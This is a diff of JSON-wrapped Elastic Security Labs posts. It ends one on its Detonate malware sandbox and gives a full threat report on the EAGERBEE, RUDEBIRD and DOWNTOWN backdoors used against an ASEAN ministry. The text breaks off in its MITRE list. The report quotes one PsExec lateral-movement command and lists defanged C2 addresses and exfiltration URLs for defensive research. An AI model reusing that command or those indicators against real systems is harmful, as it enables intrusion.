+ "document": "---\ntitle: \"Into The Weeds: How We Run Detonate\"\nslug: \"into-the-weeds-how-we-run-detonate\"\ndate: \"2023-06-13\"\nsubtitle: \"A deeper dive into the technical implementations of Detonate\"\ndescription: \"Explore the technical implementation of the Detonate system, including sandbox creation, the supporting technology, telemetry collection, and how to blow stuff up.\"\nauthor:\n - slug: jessica-david\n - slug: sergey-polzunov\n - slug: hez-carty\nimage: \"photo-edited-02@2x.jpg\"\ncategory:\n - slug: detection-science\n - slug: tools\n - slug: security-research\ntags:\n - detonate\n---\n\n## Preamble\n\nIn our [first post](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) in our Detonate series, we introduced the Detonate system and what we use it for at Elastic. We also discussed the benefits it provides our team when assessing the performance of our security artifacts.\n\nIn this publication, we will break down how Detonate works & dive deeper into the technical implementation. This includes how we’re able to create this sandboxed environment in practice, the technology that supports the overall pipeline, and how we submit information to and read information from the pipeline.\n\n> Interested in other posts on Detonate? Check out [Part 1 - Click, Click…Boom!](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) where we introduce Detonate, why we built it, explore how Detonate works, describe case studies, and discuss efficacy testing.\n\n## Architecture\n\nBelow is a high-level overview of the Detonate end-to-end architecture.\n\n\n\nThe overall system consists of a series of message queues and Python workers. Detonation tasks are created by an API server upon accepting a request with as little information as the sample file hash. The task then moves from queue to queue, picked up by workers that execute various operations along the way. \nThe server and workers run in a container on [Amazon ECS](https://aws.amazon.com/ecs/). The pipeline can also be brought up locally using [Docker Compose](https://docs.docker.com/compose/) for early development and feature testing.\n\n### API server\n\nThe Detonate API server is a [FastAPI](https://fastapi.tiangolo.com/) python application that accepts a variety of execution target requests: hashes of samples, native commands (in bash or Powershell, with or without arguments), and uploaded files. The server also exposes endpoints for fetching alerts and raw agent telemetry from an Elastic cluster.\n\nThe API documentation is generated [automatically](https://fastapi.tiangolo.com/advanced/extending-openapi/) by FastAPI and incorporated into our global API schema.\n\n\n\n#### Interacting with the API server - CLI\n\nWe built a custom Python CLI (command-line interface) tool for interacting with our Detonate server. The CLI tool is built using the Python library [click](https://click.palletsprojects.com/en/8.1.x/) along with [rich](https://github.com/Textualize/rich) for a beautiful formatting experience in a terminal window. The tool is particularly useful for debugging the pipeline, as it can also be run against a local pipeline setup. The tool is installed and runs using [Poetry](https://python-poetry.org/), our preferred tool of choice for managing dependencies and running scripts.\n\n```\n❯ DETONATE_CLI_API_ROOT_URL=\"${API_ENDPOINT_URL}\" \\\n\tDETONATE_CLI_API_AUTH_HEADER=\"${API_KEY}\" \\\n\tpoetry run cli \\\n\t--hash \"${MY_FILE_HASH}\"\n```\n\n\n\n\n\n#### Interacting with the API server - Web UI\n\nInternally, we host a site called Protections Portal (written using [Elastic UI](https://elastic.github.io/eui/) components) to assist our team with research. For a more interactive experience with the Detonate API, we built a page in the Portal to interact with it. Along with submitting tasks, the Web UI allows users to see the feed of all detonations and the details of each task.\n\n\n\nEach task can be expanded to see its full details. We provide the links to the data and telemetry collected during the detonation.\n\n\n\n#### Interacting with the API server - HTTP client\n\nIf our users want to customize how they interact with the Detonate API, they can also run commands using their HTTP client of choice (such as **curl** , **httpie** , etc.). This allows them to add detonations to scripts or as final steps at the end of their own workflows.\n\n### Queues\n\nThe pipeline is built on a series of queues and workers. Having very basic requirements for the message queues engine, we decided to go with [Amazon SQS](https://aws.amazon.com/sqs/). One of the many benefits of using a popular service like SQS is the availability of open-source resources and libraries we can build upon. For example, we use [softwaremill/elasticmq](https://github.com/softwaremill/elasticmq) Docker images as a queue engine when running the pipeline locally.\n\nThe queues are configured and deployed with Terraform code that covers all our production and staging infrastructure.\n\n### Workers\n\nEach worker is a Python script that acts as both a queue consumer and a queue producer. The workers are implemented in our custom mini-framework, with the boilerplate code for error handling, retries, and monitoring built-in. Our base worker is easily extended, allowing us to add new workers and evolve existing ones if additional requirements arise.\n\nFor monitoring, we use the [Elastic APM](https://www.elastic.co/observability/application-performance-monitoring) observability solution. It is incredibly powerful, giving us a view into the execution flow and making debugging pipeline issues a breeze. Below, we can see a Detonate task move between workers in the APM UI:\n\n\n\nThese software and infrastructure components give us everything we need to perform the submission, execution, and data collection that make up a detonation.\n\n## Detonations\n\n\n\nThe pipeline can execute commands and samples in Windows, Linux, and macOS virtual machines (VMs). For Windows and Linux environments, we use VM instances in [Google Compute Engine](https://cloud.google.com/compute). With the wide selection of public images, it allows us to provision sandboxed environments with different versions of Windows, Debian, Ubuntu, CentOS, and RHEL.\n\nFor macOS environments, we use [mac1.metal instances in AWS](https://aws.amazon.com/ec2/instance-types/mac/) and an on-demand macOS VM provisioning [solution from Veertu called Anka](https://veertu.com/anka-build/). Anka gives us the ability to quickly rotate multiple macOS VMs running on the same macOS bare metal instance.\n\nDetonate is currently focused on the breadth of our OS coverage, scalability, and the collection of contextually relevant data from the pipeline. Fitting sophisticated anti-analysis countermeasures into Detonate is currently being researched and engineered.\n\n### VM provisioning\n\nIn order to keep our footprint in the VM to a minimum, we use startup scripts for provisioning. Minimizing our footprint is important because our activities within a VM are included in the events we collect, making analysis more complicated after a run. For Windows and Linux VMs, [GCP startup scripts](https://cloud.google.com/compute/docs/instances/startup-scripts) written in Powershell and bash are used to configure the system; for macOS VMs, we wrote custom bash and AppleScript scripts.\n\nThe startup scripts perform these steps:\n\n- **Configure the system**. For example, disable MS Defender, enable macros execution in MS Office, disable automatic system updates, etc.\n- **Download and install Elastic agent**. The script verifies that the agent is properly [enrolled into the Fleet Server](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) and that the policies are applied.\n- **Download and detonate a sample, or execute a set of commands**. The execution happens in a background process, while the main script collects the STDOUT / STDERR datastreams and sleeps for N seconds.\n- **Collect files from the filesystem (if needed) and upload them into the storage**. This allows us to do any additional verification or debugging once the detonation is complete.\n\nThe VM lifecycle is managed by the **start_vm** and **stop_vm** workers. Since we expect some detonations to break the startup script execution flow (e.g., in the case of ransomware), every VM has a TTL set, which allows the **stop_vm** worker to delete VMs not in use anymore.\n\nThis clean-slate approach, with the startup script used to configure everything needed for a detonation, allows us to use VM images from the vendors from Google Cloud public images catalog without any modifications!\n\n### Network configuration\n\nSome of the samples we detonate are malicious and might produce malicious traffic, such as network scans, C2 callouts, etc. In order to keep our cloud resources and our vendor’s infrastructure safe, we limit all outgoing traffic from VMs. The instances are placed in a locked-down VPC that allows outgoing connection only to a predefined list of targets. We restrict traffic flows in VPC using Google Cloud’s [routes](https://cloud.google.com/vpc/docs/routes) and [firewall rules](https://cloud.google.com/firewall/docs/firewalls), and AWS’s [security groups](https://docs.aws.amazon.com/vpc/latest/userguide/security-groups.html).\n\nWe also make use of [VPC Flow Logs](https://cloud.google.com/vpc/docs/flow-logs) in GCE. These logs allow us to see private network traffic initiated by sandbox VMs in our VPC.\n\n### Telemetry collection\n\nTo observe detonations, we use the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integration installed with all protections in “Detect” (instead of “Protect”) mode. This allows us to collect as much information from a VM as we can, while simultaneously allowing the [Elastic Security](https://www.elastic.co/security) solution to produce alerts and detections.\n\n\n\nWe cover two use cases with this architecture: we can validate protections (comparing events and alerts produced for different OS versions, agent versions, security artifacts deployed, etc) and collect telemetry for analysis (for fresh samples or novel malware) at the same time. All data collected is kept in a persistent Elastic cluster and is available for our researchers.\n\n## Running in production\n\nRecently we completed a full month of running Detonate pipeline in production, under the load of multiple data integrations, serving internal users through UI at the same time. Our record so far is 1034 detonations in a single day, and so far, we haven’t seen any scalability or reliability issues.\n\n\n\nThe bulk of the submissions are Windows-specific samples, for now. We are working on increasing our coverage of Linux and macOS as well – stay tuned for the research blog posts coming soon!\n\n\n\nWe are constantly improving our support for various file types, making sure the detonation is as close to the intended trigger behavior as possible.\n\nLooking at the detonations from the last month, we see that most of the tasks were completed in under 13 minutes (with a median of 515 seconds). This time includes task data preparation, VM provisioning and cleanup, sample execution, and post-detonation processing.\n\n\n\nThese are still early days of the service, so it is normal to see the outliers. Since most of the time in a task is spent waiting for a VM to provision, we can improve the overall execution time by using custom VM images, pre-starting VM instances, and optimizing the startup scripts.\n\n## What's next?\n\nNow that you see how Detonate works, our next posts will dive into more detailed use cases of Detonate. We’ll go further into how these detonations turn into protecting more of our users, including right here at Elastic!\n"
+ },
+ "title": "Into The Weeds: How We Run Detonate",
+ "slug": "into-the-weeds-how-we-run-detonate",
+ "subtitle": "A deeper dive into the technical implementations of Detonate",
+ "date": "2023-06-13",
+ "description": "Explore the technical implementation of the Detonate system, including sandbox creation, the supporting technology, telemetry collection, and how to blow stuff up.",
+ "author": [
+ {
+ "slug": "jessica-david"
+ },
+ {
+ "slug": "sergey-polzunov"
+ },
+ {
+ "slug": "hez-carty"
+ }
+ ],
+ "image": "photo-edited-02@2x.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ },
+ {
+ "slug": "tools"
+ },
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "detonate"
+ ]
+ },
+ "id": "security_labs_content-into_the_weeds_how_we_run_detonate-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json
new file mode 100644
index 00000000000..75dee88e75f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json
@@ -0,0 +1,48 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Introducing the REF5961 intrusion set\"\nslug: \"introducing-the-ref5961-intrusion-set\"\ndate: \"2023-10-04\"\ndescription: \"The REF5961 intrusion set discloses three new malware families targeting ASEAN members. The threat actor leveraging this intrusion set continues to develop and mature their capabilities.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: cyril-francois\n - slug: seth-goodwin\n - slug: andrew-pease\nimage: \"photo-edited-08@2x.jpg\"\ncategory:\n - slug: security-research\n - slug: malware-analysis\ntags:\n - security-research\n - malware-analysis\n - ref5961\n - ref2924\n - eagerbee\n - downtown\n - rudebird\n---\n\n## Preamble\n\n**Updated October 11, 2023 to include links to the BLOODALCHEMY backdoor.**\n\nElastic Security Labs continues to monitor state-aligned activity, targeting governments and multinational government organizations in Southern and Southeastern Asia. We’ve observed a batch of new and unique capabilities within a complex government environment. This intrusion set is named REF5961.\n\nIn this publication, we will highlight distinctions between malware families, demonstrate relationships to known threats, describe their features, and share resources to identify or mitigate elements of an intrusion. Our intent is to help expose this ongoing activity so the community can better understand these types of threats.\n\nThe samples in this research were discovered to be co-residents with a previously reported intrusion set, REF2924 (original reporting [here](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) and updated [here](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)). The victim is the Foreign Affairs Ministry of a member of the Association of Southeast Asian Nations (ASEAN). \n\nElastic Security Labs describes the operators of the REF2924 and REF5961 intrusion sets as state-sponsored and espionage-motivated due to observed targeting and post-exploitation collection activity. Further, the correlation of execution flows, tooling, infrastructure, and victimology of multiple campaigns we’re tracking along with numerous third-party reports makes us confident this is a China-nexus actor.\n\n\n\n\nPart of this intrusion set includes a new x86-based backdoor called BLOODALCHEMY, and it is covered in depth [here](https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor).\n\n## Key takeaways\n\n* Elastic Security Labs is disclosing three new malware families:\n * EAGERBEE\n * RUDEBIRD\n * DOWNTOWN\n* Code sharing and network infrastructure have connected malware in this intrusion set to other campaigns\n* The threat actors targeting ASEAN governments and organizations continue to develop and deploy additional capabilities\n\n## EAGERBEE\n\nEAGERBEE is a newly identified backdoor discovered by Elastic Security Labs that loads additional capabilities using remotely-downloaded PE files, hosted in C2. However, its implementation and coding practices reveal a lack of advanced skills from the author, relying on basic techniques.\n\nDuring our research outlined below, we identified string formatting and underlying behavior that aligns with previous research attributed to a Chinese-speaking threat actor referred to as [LuckyMouse](https://malpedia.caad.fkie.fraunhofer.de/actor/apt27) (APT27, EmissaryPanda).\n\n### Code analysis\n\nEAGERBEE dynamically constructs its Import Address Table (IAT) during runtime, populating a designated data structure with the memory addresses of essential Windows APIs that the malware needs.\n\n\n\n\n**_Note: Dynamic import tables are used as an anti-analysis technique by malware authors to impair static analysis of their binaries. These techniques prevent most static analysis software from determining the imports and thus force analysts through laborious manual methods to determine what the malware is doing._**\n\nAfter resolving all the required Windows APIs, the malware creates a mutex with the string `mstoolFtip32W` to prevent multiple instances of the malware from running on the same machine.\n\n\n\n\nThe malware gathers key information about the compromised system:\n* The computer's name is obtained using the `GetComputerNameW` function\n* The malware retrieves the Windows version by utilizing the `GetVersionExW` function\n* A globally unique identifier (GUID) is generated through the `CoCreateGuid` function\n* The processor architecture information is acquired using the `GetNativeSystemInfo` function\n* The ProductName, EditionID, and CurrentBuildNumber are extracted from the designated registry key `SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion`\n\n\n\n\nThe sample’s operational schedule is controlled by the string `0-5:00:23;6:00:23;`. In our sample the malware conforms to the outlined schedule using the ISO 8601 24-hour timekeeping system: \n* active from Sunday(0) to Friday(5)\n* all hours between 00 and 23\n* Saturday(6) all hours between 00 and 23\n\nThis functionality allows the malware to impose self-restrictions during specific timeframes, showcasing both its adaptability and control.\n\n\n\n\nThe malware's C2 addresses are either hardcoded values or stored in an XOR-encrypted file named `c:\\users\\public\\iconcache.mui`. This file is decrypted using the first character as the decryption key.\n\nThis configuration file contains a list of semicolon-delimited IP addresses. The format adheres to the structure `IP:PORT`, where the character `s` is optional and instructs the malware to open a Secure Socket Layer (SSL) for encrypted communication between C2 and the malware.\n\n\n\nThe configuration optionally accepts a list of port numbers on which the malware will listen. The specific configuration mode, whether it's for reverse or forward connections, determines this behavior.\n\nA configuration flag is embedded directly into the code in both operating modes. This flag empowers the malware to select between utilizing SSL encryption during its interactions with the C2 server or plain text communication.\n\nIn passive listening mode, the malware opens a listening socket on the port indicated in its configuration.\n\nWhen operating in active connection mode, the malware attempts to load its configuration from the file `c:\\users\\public\\iconcache.mui`. In the event that this file is not found, the malware falls back to its hardcoded configuration to acquire the necessary IPs\n\nThe author employs a global variable embedded in the source code to select between modes. Importantly, both are included in the binary, with only one being executed based on the selection. Leaving this dormant capability in the binary may have been a mistake, but one that helps researchers understand the technical maturity of this group. Generally speaking, malware authors benefit from removing unused code that may be used against them.\n\n\n\n\n**_Note: In C programming, modularity is achieved through the use of #define directives to selectively include or exclude code parts in the compiled binary. However, the malware developer employed a less advisable approach in this case. They utilized static global variables whose values are set during compilation. Consequently, the resulting binary contains both utilized and unused functions. During runtime, the binary assesses the value of these static global variables to determine its behavior. Though functional, this is neither the best programming nor tradecraft practice as it permits analysis and detection engineering of code used outside the identified intrusion._**\n\nThe malware has the capability to detect the presence of an HTTP proxy configuration on the host machine by inspecting the `ProxyEnable` registry key within `Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings`. If this key value is set to `1`, the malware extracts the information in the `ProxyServer` key. \n\nIf no proxy server is set, the malware connects directly to C2. \n\nHowever, if the proxy settings are defined, the malware also initializes the proxy by sending a `CONNECT` request, and its data to the configured destination. The malware author made a typo in the HTTP request code; they mistakenly wrote `DONNECT` instead of `CONNECT` in the HTTP request string in the binary. This is a reliably unique indicator for those analyzing network captures.\n\t\n\n\n\nUpon establishing a connection to C2, The malware downloads executable files from C2, likely pushed automatically. It validates that each executable is 64bit, then extracts the entry point and modifies memory protections to allow execution using the VirtualProtect API.\n\n\n\n\n### EAGERBEE connection to a Mongolian campaign\n\nDuring our EAGERBEE analysis, we also saw an additional two (previously unnamed) EAGERBEE [samples](https://www.virustotal.com/gui/search/09005775FC587AC7BF150C05352E59DC01008B7BF8C1D870D1CEA87561AA0B06%250AA191D8059E93C0AB479DE45CDD91C41B985F9BCCD7B2CAD9F171FEA1C5F19E2E/files) involved in a targeted campaign focused on Mongolia. These two EAGERBEE samples were both respectively bundled with other files and used a similar naming convention (`iconcache.mui` for EAGERBEE and `iconcaches.mui` in the Mongolian campaign). The samples consisted of multiple files and a lure document.\n\n\n\n\nWhile analyzing the Mongolian campaign samples, we found a previous [webpage](https://www.virustotal.com/gui/url/7e0d899d54c6a0f43fbac0e633d821eefa9057e29df8c4956321fe947daaaa54) (`http://president[.]mn/en/ebooksheets.php`) hosted under Mongolian infrastructure serving a [RAR file](https://www.virustotal.com/gui/file/af8cb76d9d955d654ec89b85d1ab35e1886ec2ba1a8c600a451d1bd383fb4e66/detection) named `20220921_2.rar`. Given the VirusTotal scan date of the file and the filename, it is likely to have been created in September 2022.\n\nThe lure text is centered around the regulations for the “Billion Trees National Movement Fund” and has been an important [topic](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) in recent years related to an initiative taken on by Mongolia. To address food security, climate impacts, and naturally occurring but accelerating desertification, Mongolia’s government has undertaken an ambitious goal of planting one billion trees throughout the country.\n\n\n\n\nFor this infection chain, they leveraged a signed Kaspersky application in order to sideload a [malicious DLL](https://www.virustotal.com/gui/file/4b3dc8609cba089e666b2086264e6f71dada57fdb3f160d2f5e546881a278766/relations). Upon execution, sensitive data and files were collected from the machine and uploaded to a hard-coded Mongolian government URL (`www.president[.]mn/upload.php`) via cURL. Persistence is configured using a Registry Run Key.\n\n\n\n\n**_Note: Though it does not contain the .gov second-level domain, www.president[.]mn does appear to be the official domain of the President of Mongolia, and is hosted within government infrastructure. Abuse email is directed to oyunbold@datacenter.gov[.]mn which appears to be legitimate._** Based on string formatting and underlying behavior, this sample aligns with public [reporting](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) from AVAST related to a utility they call DataExtractor1.\n\n\n\n\nWhile we didn’t find a WinRAR archive for the other linked sample, we found this related [executable](https://www.virustotal.com/gui/file/a191d8059e93c0ab479de45cdd91c41b985f9bccd7b2cad9f171fea1c5f19e2e). It functions similarly, using a different callback domain hosted on Mongolian infrastructure (`https://intranet.gov[.]mn/upload.php`).\n\n\n\n\nWhile it is not clear how this infrastructure was compromised or the extent to which it has been used, impersonating trusted systems may have enabled the threat to compromise other victims and collect intelligence.\n\n### EAGERBEE Summary\n\nEAGERBEE is a technically straightforward backdoor with forward and reverse C2 and SSL encryption capabilities, used to conduct basic system enumeration and deliver subsequent executables for post-exploitation. The C2 mode is defined at compile time, and configurable with an associated config file with hardcoded fallback.\n\nUsing code overlap analysis, and the fact that EAGERBEE was bundled with other samples from VirusTotal, we identified a C2 server hosted on Mongolian government infrastructure. The associated lure documents also reference Mongolian government policy initiatives. This leads us to believe that the Mongolian government or non-governmental organizations (NGOs) may have been targeted by the REF2924 threat actor.\n\n## RUDEBIRD\n\nWithin the contested REF2924 environment, Elastic Security Labs identified a lightweight Windows backdoor that communicates over HTTPS and contains capabilities to perform reconnaissance and execute code. We refer to this malware family as RUDEBIRD.\n\n### Initial execution\n\nThe backdoor was executed by a file with an invalid signature, `C:\\Windows\\help\\RVTDM.exe`, which resembles the Sysinternals screen magnifier utility ZoomIt. Shortly after being executed, Elastic Defend registered a process injection alert. \n\n\n\n\nThe process was executed with the parent process (`w3wp.exe`) coming from a Microsoft Exchange application pool. This is consistent with the exploitation of an unpatched Exchange vulnerability, and prior research supports that hypothesis.\n\n### Lateral movement\n\nRUDEBIRD used PsExec (`exec.exe`) to execute itself from the SYSTEM account and then move laterally from victim 0 to another targeted host. It is unclear if PsExec was brought to the environment by the threat actor or if it was already present in the environment. \n\n`\"C:\\windows\\help\\exec.exe\" /accepteula \\\\{victim-1} -d -s C:\\windows\\debug\\RVTDM.EXE`\n\n### Code analysis\n\nRUDEIBIRD is composed of shellcode that resolves imports dynamically by accessing the Thread Environment Block (TEB) / Process Environment Block (PEB) and walking the loaded modules to find base addresses for the `kernel32.dll` and `ntdll.dll` modules. These system DLLs contain crucial functions that will be located by the malware in order to interact with the Windows operating system.\n\n\n\n\nRUDEBIRD uses a straightforward API hashing algorithm with multiplication (`0x21`) and addition that is [publicly available](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) from OALabs. This provides defense against static-analysis tools that analysts may use to inspect the import table and discern what capabilities a binary has.\n\n\n\n\nAfter resolving the libraries, there is an initial enumeration function that collects several pieces of information including:\n* Hostname\n* Computer name\n* Username\n* IP Address\n* System architecture\n* Privilege of the current user\n\nFor some functions that return larger amounts of data, the malware implements compression using `RtlCompressBuffer`. The malware communicates using HTTPS to IP addresses loaded in memory from its configuration. We observed two IP addresses in the configuration in our sample:\n\n* `45.90.58[.]103`\n* `185.195.237[.]123`\n\nStrangely, there are several functions throughout the program that include calls to `OutputDebugStringA`. This function is typically used during the development phase and serves as a mechanism to send strings to a debugger while testing a program. Normally, these debug messages are expected to be removed after development is finished. For example, the result of the administrator check is printed if run inside a debugger.\n\n\n\n\nRUDEBIRD uses mutexes to maintain synchronization throughout its execution. On launch, the mutex is set to `VV.0`.\n\n\n\n\nAfter the initial enumeration stage, RUDEBIRD operates as a traditional backdoor with the following capabilities:\n* Retrieve victim’s desktop directory path\n* Retrieve disk volume information \n* Perform file/directory enumeration\n* Perform file operations such as reading/writing file content\n* Launch new processes\n* File/folder operations such as creating new directories, move/copy/delete/rename files\n* Beacon timeout option\n\n## DOWNTOWN (SManager/PhantomNet)\n\nIn the REF2924 environment, we observed a modular implant we call DOWNTOWN. This sample shares a plugin architecture, and code similarities, and aligns with the victimology described in the publicly reported malware [SManager/PhantomNet](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager). While we have little visibility into the impacts of its overall use, we wanted to share any details that may help the community. \n\nSManager/PhantomNet has been attributed to [TA428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) (Colourful Panda, BRONZE DUDLEY), a threat actor likely sponsored by the Chinese government. Because of the shared plugin architecture, code similarities, and victimology, we are attributing DOWNTOWN with a moderate degree of confidence to a nationally sponsored Chinese threat actor.\n\n### Code analysis\n\nFor DOWNTOWN, we collected the plugin from a larger framework. This distinction is made based on unique and shared exports from previously published [research](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) by ESET. One of the exports contains the same misspelling previously identified in the ESET blog, `GetPluginInfomation` (note: `Infomation` is missing an `r`). The victimology of REF2924 is consistent with their reported victim vertical and region.\n\n\n\n\nIn our sample, the plugin is labeled as “ExplorerManager”. \n\n\n\n\nThe majority of the code appears to be centered around middleware functionality (linked lists, memory management, and thread synchronization) used to task the malware. \n\n\n\n\nIn a similar fashion to RUDEBIRD above, DOWNTOWN also included the debug functionality using `OutputDebugStringA`. Again, debugging frameworks are usually removed once the software is moved from development to production status. This could indicate that this module is still in active development or a lack of operational scrutiny by the malware author(s).\n\n\n\n\nSome functionality observed in the sample included:\n* File/folder enumeration\n* Disk enumeration\n* File operations (delete/execute/rename/copy)\n\nUnfortunately, our team did not encounter any network/communication functionality or find any domain or IP addresses tied to this sample. \n\n### DOWNTOWN Summary\n\nDOWNTOWN is part of a modular framework that shows probable ties to an established threat group. The observed plugin appears to provide middleware functionality to the main implant and contains several functions to perform enumeration.\n\n## Network infrastructure intersection\n\nWhen performing an analysis of the network infrastructure for EAGERBEE and RUDEBIRD, we identified similarities in the domain hosting provider, subdomain naming, registration dates, and service enablement between the two malware families’ C2 infrastructure. Additionally, we were able to use TLS leaf certificate fingerprints to establish another connection between EAGERBEE and the Mongolian campaign infrastructure.\n\n### Shared network infrastructure\n\nAs identified in the malware analysis section for EAGERBEE, there were two IP addresses used for C2: `185.82.217[.]164` and `195.123.245[.]79`.\n\nOf the two, `185.82.217[.]164` had an expired TLS certificate registered to it for `paper.hosted-by-bay[.]net`. The subdomain registration for `paper.hosted-by-bay[.]net` and the TLS certificate were registered on December 14, 2020.\n\n![paper.hosted-by-bay[.]net TLS certificate](/assets/images/introducing-the-ref5961-intrusion-set/image17.jpg)\n\n\nAs identified in the malware analysis section for RUDEBIRD, there were two IP addresses used for C2: `45.90.58[.]103` and `185.195.237[.]123`.\n\n`45.90.58[.]103` was used to register the subdomain `news.hosted-by-bay[.]net`, on December 13, 2020.\n\nBoth IP addresses (one from EAGERBEE and one from RUDEBIRD) were assigned to subdomains (`paper.hosted-by-bay[.]net` and `news.hosted-by-bay[.]net`) within one day at the domain `hosted-by-bay[.]net`.\n\n**_Note: While `195.123.245[.]79` (EAGERBEE) and `185.195.237[.]123` (RUDEBIRD) are malicious, we were unable to identify anything atypical of normal C2 nodes. They used the same defense evasion technique (described below) used by `185.82.217[.]164` (EAGERBEE) and `45.90.58[.]103` (RUDEBIRD)._**\n\n### Domain analysis\n\nWhen performing an analysis of the `hosted-by-bay[.]net` domain, we see that it is registered to the IP address `45.133.194[.]106`. This IP address exposes two TCP ports, one is the expected TLS port of `443`, and the other is `62753`.\n\n**_Note: Port `443` has a Let’s Encrypt TLS certificate for `paypal.goodspaypal[.]com`. This domain does not appear to be related to this research but should be categorized as malicious based on its registration to this IP._**\n\nOn port `62753`, there was a self-signed wildcard TLS leaf certificate with a fingerprint of `d218680140ad2c6e947bf16020c0d36d3216f6fc7370c366ebe841c02d889a59` (`*.REDACTED[.]mn`). This fingerprint is used for one host, `shop.REDACTED[.]mn`. The 10-year TLS certificate was registered on December 13, 2020.\n\n```\nValidity\nNot Before: 2020-12-13 11:53:20\nNot After: 2030-12-11 11:53:20\nSubject: CN=shop.REDACTED[.]mn\n```\n\n`.mn` is the Internet ccTLD for Mongolia and REDACTED is a large bank in Mongolia. When researching the network infrastructure for REDACTED, we can see that they do currently own their DNS infrastructure.\n\nIt does not appear that `shop.REDACTED[.]mn` was ever registered. This self-signed TLS certificate was likely used to encrypt C2 traffic. While we cannot confirm that this certificate was used for EAGERBEE or RUDEBIRD, in the malware code analysis of both EAGERBEE and RUDEBIRD, we identified that TLS to an IP address is an available malware configuration option. We do believe that this domain is related to EAGERBEE and RUDEBIRD based on the registration dates, IP addresses, and subdomains of the `hosted-by-bay[.]net` domain.\n\nAs noted in the EAGERBEE malware analysis, we identified two other previously unnamed EAGERBEE samples used to target Mongolian victims and also leveraged Mongolian C2 infrastructure.\n\n### Defense evasion\n\nFinally, we see all of the C2 IP addresses add and remove services at similar dates and times. This is a tactic to hinder the analysis of the C2 infrastructure by limiting its availability. It should be noted that the history of the service enablement and disablement (provided by [Censys.io](https://search.censys.io/) databases) is meant to show possible coordination in C2 availability. The images below show the last service change windows, further historical data was not available.\n\n`192.123.245[.]79` had TCP port `80` enabled on September 22, 2023 at 07:31 and then disabled on September 24, 2023 at 07:42.\n\n![192.123.245[.]79 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image6.jpg)\n\n\n`185.195.237[.]123` had TCP port `443` enabled on September 22, 2023 at 03:33 and then disabled on September 25, 2023 at 08:08.\n\n![185.195.237[.]123 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image23.jpg)\n\n\n`185.82.217[.]164` had TCP port `443` enabled on September 22, 2023 at 08:49 and then disabled on September 25, 2023 at 01:02.\n\n![185.82.217[.]164 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image20.jpg)\n\n\n`45.90.58[.]103` had TCP port `443` enabled on September 22, 2023 at 04:46 and then disabled on September 24, 2023 at 09:57.\n\n![45.90.58[.]103 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image10.jpg)\n\n\n### Network intersection summary\n\nEAGERBEE and RUDEBIRD are two malware samples, co-resident on the same infected endpoint, in the same environment. This alone builds a strong association between the families. \n\nWhen adding the fact that both families use C2 endpoints that have been used to register subdomains on the same domain `hosted-by-bay[.]net`), and the service availability coordination, leads us to say with a high degree of confidence that the malware and campaign operators are from the same tasking authority, or organizational umbrella.\n\n## Summary\n\nEAGERBEE, RUDEBIRD, and DOWNTOWN backdoors all exhibit characteristics of incompleteness whether using “Test” in file/service names, ignoring compilation best practices, leaving orphaned code, or leaving a smattering of extraneous debug statements.\n\nThey all, however, deliver similar tactical capabilities in the context of this environment.\n* Local enumeration\n* Persistence\n* Download/execute additional tooling\n* C2 options\n\nThe variety of tooling performing the same or similar tasks with varying degrees and types of miscues causes us to speculate that this environment has attracted the interest of multiple players in the REF2924 threat actor’s organization. The victim's status as a government diplomatic agency would make it an ideal candidate as a stepping-off point to other targets within and outside the agency’s national borders. Additionally, it is easy to imagine that multiple entities within a national intelligence apparatus would have collection requirements that could be satisfied by this victim directly. \n\nThis environment has already seen the emergence of the REF2924 intrusion set (SIESTAGRAPH, NAPLISTENER, SOMNIRECORD, and DOORME), as well as the deployment of SHADOWPAD and COBALTSTRIKE. The REF2924 and REF5961 threat actor(s) continue to deploy new malware into their government victim’s environment.\n\n## REF5961 and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advance persistent threats used against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n* EAGERBEE\n * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n * [Execution](https://attack.mitre.org/tactics/TA0002/)\n* RUDEBIRD\n * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n * [Collection](https://attack.mitre.org/tactics/TA0009/)\n * [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)\n * [Execution](https://attack.mitre.org/tactics/TA0002/)\n* DOWNTOWN\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * 